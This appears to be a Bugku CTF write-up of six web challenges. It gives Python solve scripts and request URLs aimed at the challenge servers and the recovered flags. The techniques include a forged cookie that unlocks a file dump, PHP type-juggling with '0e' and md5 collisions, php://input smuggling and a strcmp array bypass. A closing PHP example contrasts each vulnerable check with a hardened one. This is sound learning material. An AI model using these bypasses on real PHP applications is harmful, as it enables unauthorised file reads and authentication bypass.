Qiumingshan veteran driver (秋名山老司机)
http://123.206.87.240:8002/qiumingshan/
Whether you are a veteran driver or not, try it and you will know.
Solution script (the page shows an arithmetic expression that must be answered before it changes, so the script fetches it, evaluates it and posts the result within the same session):
# -*- coding:utf-8 -*-
import re
import requests

# The expression sits in the page as <div>1234*5678+...=?;</div>; pull it out
def content(html):
    reg = r'<div>(.*?)\=\?;</div>'
    return re.findall(reg, html)

if __name__ == '__main__':
    url = 'http://123.206.87.240:8002/qiumingshan/'
    r = requests.get(url)
    content_list = content(r.text)
    code = content_list[0]
    print(code)
    # Evaluate the server-supplied expression (only ever point this at the CTF target)
    result = eval(code)
    print(result)
    payload = {"value": result}
    # Send the session cookie back so the answer is checked against the same expression
    response = requests.post(url=url, data=payload, cookies=r.cookies)
    print(response.text)
Bugku{YOU_DID_IT_BY_SECOND}
Be fast
Be fast!!!!!!
http://123.206.87.240:8002/web6/
Format: KEY{xxxxxxxxxxxxxx}
# -*- coding:utf-8 -*-
import requests
import base64

if __name__ == '__main__':
    url = 'http://123.206.87.240:8002/web6/'
    r = requests.get(url)
    # The 'flag' response header is base64; decoding it gives "...: <base64>",
    # and decoding the part after ': ' gives the value to submit as 'margin'
    flag = base64.b64decode(r.headers['flag']).decode()
    flag = base64.b64decode(flag.split(': ')[1]).decode()
    payload = {"margin": flag}
    # Must be posted quickly, with the same session cookie, before the value rotates
    response = requests.post(url=url, data=payload, cookies=r.cookies)
    print(response.text)
KEY{111dd62fcd377076be18a}
Cookie spoofing
http://123.206.87.240:8002/web11/
Answer format: KEY{xxxxxxxx}
# -*- coding:utf-8 -*-
import requests

BASE = 'http://123.206.87.240:8002/web11/index.php'

# index.php returns one line of the requested file per request; 'filename' is base64
def dump(filename_b64, cookies=None):
    for i in range(100):
        r = requests.get(BASE, params={'line': i, 'filename': filename_b64}, cookies=cookies)
        # print(i)
        if r.text == '':
            break
        print(r.text)

if __name__ == '__main__':
    # Step 1: dump index.php itself ("aW5kZXgucGhw" is base64 of index.php)
    dump('aW5kZXgucGhw')
    # Recovered source of index.php:
    # <?php
    # error_reporting(0);
    # $file = base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
    # $line = isset($_GET['line'])?intval($_GET['line']):0;
    # if ($file == '') header("location:index.php?line=&filename=a2V5cy50eHQ=");
    # $file_list = array(
    #     '0' => 'keys.txt',
    #     '1' => 'index.php',
    # );
    #
    # if (isset($_COOKIE['margin']) && $_COOKIE['margin'] == 'margin'){
    #     $file_list[2]='keys.php';
    # }
    # if (in_array($file, $file_list)){
    #     $fa = file($file);
    #     echo $fa[$line];
    # }
    # ?>
    # Step 2: with the cookie margin=margin, keys.php is whitelisted
    # ("a2V5cy5waHA=" is base64 of keys.php), so dump it the same way
    dump('a2V5cy5waHA=', cookies={"margin": "margin"})
KEY{key_keys}
never give up
http://123.206.87.240:8006/test/hello.php
Author: 御结冰城
Visiting the URL redirects by default to http://123.206.87.240:8006/test/hello.php?id=1. Viewing the page source reveals a page 1p.html; the source of 1p.html contains a snippet of JavaScript. Pasting it into the browser console and running it yields a base64 string. Base64-decode it, then URL-decode the result, and you get a piece of PHP code. The head of the PHP code is missing; completed, it reads:
<?php
if(!$_GET['id']) {
    header('Location: hello.php?id=1');
    exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.')) {
    echo 'no no no no no no no';
    return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4) {
    require("f4l2a3g.txt");
} else {
    print "never never never give up !!!";
}
?>
This is a code-audit task: three parameters must be passed. id must satisfy $id==0 but must not be falsy, otherwise the first check redirects; id=0e works because the string is truthy yet loosely equals 0:
if(!$_GET['id']) { header('Location: hello.php?id=1'); exit(); }
a must not contain a dot, so we pass php://input to get past this check:
if(stripos($a,'.')) { echo 'no no no no no no no'; return ; }
file_get_contents('php://input','r') reads the raw POST body, so sending bugku is a nice plateform! as the POST body satisfies the $data comparison.
Use b=*11111 to pass the check below: the pattern becomes 111* which eregi matches against "1114", the length is over 5, and the first character is not 4.
strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4
The final solution script:
# -*- coding:utf-8 -*-
import requests

if __name__ == '__main__':
    # id=0e passes !$id but satisfies $id==0; a=php://input has no dot and reads
    # the POST body; b=*11111 satisfies the eregi/strlen/substr checks
    url = 'http://123.206.87.240:8006/test/hello.php?id=0e&a=php://input&b=*11111'
    # The raw body is what php://input will return
    r = requests.post(url, data='bugku is a nice plateform!')
    print(r.text)
flag{tHis_iS_THe_fLaG}
Characters? Regex?
http://123.206.87.240:8002/web10/
Opening the page shows the source directly; getting past the regular expression gives the flag. I recommend the Xeger package, which automatically generates random strings matching a regex. In my testing its accuracy was only average, but it is good enough, and much faster than working a string out by hand.
<?php
highlight_file('2.php');
$key='KEY{********************************}';
$IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match);
if( $IM ){
    die('key is: '.$key);
}
?>
Solution script:
# -*- coding:utf-8 -*-
import re
import string
import requests
from xeger import Xeger

# The PHP pattern carries PCRE delimiters, the /i flag and a POSIX [[:punct:]]
# class, none of which Python's re understands; translate it so the generated
# strings actually satisfy the server-side preg_match
pattern = re.compile(
    r'key.*key.{4,7}key:\/.\/(.*key)[a-z][' + re.escape(string.punctuation) + ']',
    re.I)
_x = Xeger(limit=8)
for i in range(8):
    out = _x.xeger(pattern)
    # Pass the value via params so requests URL-encodes any '&', '#' or '?'
    # the generator happens to produce
    r = requests.get('http://123.206.87.240:8002/web10/', params={'id': out})
    print(r.text)
Because Xeger's accuracy is not high, just test a few more times; I let it loop 8 times and one or two attempts got through.
KEY{0x0SIOPh550afc}
Ex-girlfriend (SKCTF)
Flag format: SKCTF{xxxxxxxxxxxxxxxxxx}
Viewing the page source leads to code.txt:
<?php
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];
    $v3 = $_GET['v3'];
    if($v1 != $v2 && md5($v1) == md5($v2)){
        if(!strcmp($v3, $flag)){
            echo $flag;
        }
    }
}
?>
Code audit: the md5 == comparison is at a glance the md5 "0e" check (two different strings whose md5 hashes both start with 0e compare equal under ==); two such strings can be taken from http://www.liugongrui.com/?id=3.
strcmp($v3,$flag) compares two strings and returns 0 when they are equal. We do not know $flag (if we did, there would be no need to solve the challenge), so we bypass the check with a PHP function quirk: passing $v3 as an array makes strcmp return a falsy value instead of 0, so !strcmp() is true. Solution:
http://123.206.31.85:49162/index.php?v1=s878926199a&v2=s155964671a&v3[]=f
SKCTF{Php_1s_tH3_B3St_L4NgUag3}
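As an added example (not from the writeup or the challenge authors), the loose-comparison checks exploited in the never-give-up and SKCTF challenges beside a hardened version of each; it assumes PHP 7 semantics, where strcmp() given an array returns NULL with a warning, and uses a constructed placeholder flag.

```php
<?php
// Added example, not from the writeup. Assumes PHP 7: strcmp() given an array
// returns NULL with a warning (PHP 8 throws a TypeError instead).

// VULNERABLE: the checks as they appear in the challenges above.
function vulnerable_check(array $q, string $flag): bool
{
    $id = $q['id'] ?? '';
    // "0e" is truthy, so !$id passes, yet "0e" == 0 is true in PHP 7 (the
    // non-numeric string is cast to int), which is why id=0e worked.
    if (!$id || $id != 0) return false;

    $v1 = $q['v1'] ?? ''; $v2 = $q['v2'] ?? ''; $v3 = $q['v3'] ?? '';
    // md5("s878926199a") and md5("s155964671a") both start with "0e";
    // == treats them as numeric strings equal to 0, so they compare equal.
    if ($v1 != $v2 && md5($v1) == md5($v2)) {
        return !strcmp($v3, $flag);   // v3[]=f makes this NULL, so !NULL is true
    }
    return false;
}

// HARDENED: reject non-string input, compare with === / hash_equals().
function hardened_check(array $q, string $flag): bool
{
    foreach (['id', 'v1', 'v2', 'v3'] as $k) {
        if (!isset($q[$k]) || !is_string($q[$k])) return false; // arrays rejected
    }
    if ($q['id'] !== '0') return false;                 // no type juggling
    if ($q['v1'] === $q['v2']) return false;
    if (md5($q['v1']) !== md5($q['v2'])) return false;  // strict string compare
    return hash_equals($flag, $q['v3']);                // constant-time, strict
}

$flag = 'SKCTF{placeholder}';   // constructed stand-in, not the real flag
// The exact bypass from the writeup: id=0e, two 0e-hash strings, v3 as an array
$bypass = ['id' => '0e', 'v1' => 's878926199a', 'v2' => 's155964671a', 'v3' => ['f']];
var_dump(vulnerable_check($bypass, $flag));   // accepted by the loose checks
var_dump(hardened_check($bypass, $flag));     // rejected: v3 is not a string
```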